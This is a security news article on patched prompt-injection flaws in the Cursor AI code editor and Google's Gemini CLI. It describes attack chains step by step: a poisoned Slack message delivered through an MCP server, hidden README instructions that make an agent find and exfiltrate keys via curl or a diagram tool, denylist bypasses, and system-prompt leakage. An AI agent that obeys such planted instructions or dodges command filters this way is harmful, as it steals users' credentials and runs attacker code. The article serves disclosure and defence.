Cybersecurity researchers have disclosed a now-patched, high-severity security flaw in Cursor, a popular artificial intelligence (AI) code editor, that could result in remote code execution.
The vulnerability, tracked as CVE-2025-54135 (CVSS score: 8.6), has been addressed in version 1.3 released on July 29, 2025. It has been codenamed CurXecute by Aim Labs, which previously disclosed EchoLeak.
“Cursor runs with developer‑level privileges, and when paired with an MCP server that fetches untrusted external data, that data can redirect the agent’s control flow and exploit those privileges,” the Aim Labs Team said in a report shared with The Hacker News.
“By feeding poisoned data to the agent via MCP, an attacker can gain full remote code execution under the user privileges, and achieve any number of things, including opportunities for ransomware, data theft, AI manipulation and hallucinations, etc.”
In other words, the remote code execution triggered by a single externally‑hosted prompt‑injection that silently rewrites the “~/.cursor/mcp.json” file and runs attacker‑controlled commands.
The vulnerability is similar to EchoLeak in that the tools, which are exposed by Model Control Protocol (MCP) servers for use by AI models and facilitate interaction with external systems, such as querying databases or invoking APIs, could fetch untrusted data that can poison the agent’s expected behavior.
Specifically, Aim Security found that the mcp.json file used to configure custom MCP servers in Cursor can trigger the execution of any new entry (e.g., adding a Slack MCP server) without requiring any confirmation.
This auto-run mode is particularly dangerous because it can lead to the automatic execution of a malicious payload that’s injected by the attacker via a Slack message. The attack sequence proceeds as follows –
- User adds Slack MCP server via Cursor UI
- Attacker posts message in a public Slack channel with the command injection payload
- Victim opens a new chat and asks Cursor’s agent to use the newly configured Slack MCP server to summarize their messages in a prompt: “Use Slack tools to summarize my messages”
- The agent encounters a specially crafted message designed to inject malicious commands to its context
“The core cause of the flaw is that new entries to the global MCP JSON file are starting automatically,” Aim Security said. “Even if the edit is rejected, the code execution had already happened.”
The entire attack is noteworthy for its simplicity. But it also highlights how AI-assisted tools can open up new attack surfaces when processing external content, in this case, any third-party MCP server.
“As AI agents keep bridging external, internal, and interactive worlds, security models must assume external context may affect the agent runtime – and monitor every hop,” the company added.
Version 1.3 of Cursor also addresses another issue with auto-run mode that can easily circumvent the platform’s denylist-based protections using methods like Base64-encoding, shell scripts, and enclosing shell commands within quotes (e.g., “e”cho bypass) to execute unsafe commands.
Following responsible disclosure by the BackSlash Research Team, Cursor has taken the step of altogether deprecating the denylist feature for auto-run in favor of an allowlist.
“Don’t expect the built-in security solutions provided by vibe coding platforms to be comprehensive or foolproof,” researchers Mustafa Naamneh and Micah Gold said. “The onus is on end-user organizations to ensure agentic systems are equipped with proper guardrails.”
The disclosure comes as HiddenLayer also found that Cursor’s ineffective denylist approach can be weaponized by embedding hidden malicious instructions with a GitHub README.md file, allowing an attacker to steal API keys, SSH credentials, and even run blocked system commands.
“When the victim viewed the project on GitHub, the prompt injection was not visible, and they asked Cursor to git clone the project and help them set it up, a common occurrence for an IDE-based agentic system,” researchers Kasimir Schulz, Kenneth Yeung, and Tom Bonner noted.
“However, after cloning the project and reviewing the readme to see the instructions to set up the project, the prompt injection took over the AI model and forced it to use the grep tool to find any keys in the user’s workspace before exfiltrating the keys with curl.”
HiddenLayer said it also found additional weaknesses that could be abused to leak Cursor’s system prompt by overriding the base URL provided for OpenAI API requests to a proxied model, as well as exfiltrate a user’s private SSH keys by leveraging two benign tools, read_file and create_diagram, in what’s called a tool combination attack.
This essentially involves inserting a prompt injection command within a GitHub README.md file that’s parsed by Cursor when the victim user asks the code editor to summarize the file, resulting in the execution of the command.
The hidden instruction, for its part, uses the read_file tool to read private SSH keys belonging to the user and then utilizes the create_diagram tool to exfiltrate the keys to an attacker-controlled webhook.site URL. All the identified shortcomings have been remediated by Cursor in version 1.3.
News of various vulnerabilities in Cursor comes as Tracebit devised an attack targeting Google’s Gemini CLI, an open-source command-line tool fine-tuned for coding tasks, that exploited a default configuration of the tool to surreptitiously exfiltrate sensitive data to an attacker-controlled server using curl.
Like observed in the case of Cursor, the attack requires the victim to (1) instruct Gemini CLI to interact with an attacker-created GitHub codebase containing a nefarious indirect prompt injection in the GEMINI.md context file and (2) add a benign command to an allowlist (e.g., grep).
“Prompt injection targeting these elements, together with significant validation and display issues within Gemini CLI could cause undetectable arbitrary code execution,” Tracebit founder and CTO Sam Cox said.
To mitigate the risk posed by the attack, Gemini CLI users are advised to upgrade their installations to version 0.1.14 shipped on July 25, 2025.
About The Author
Original post here
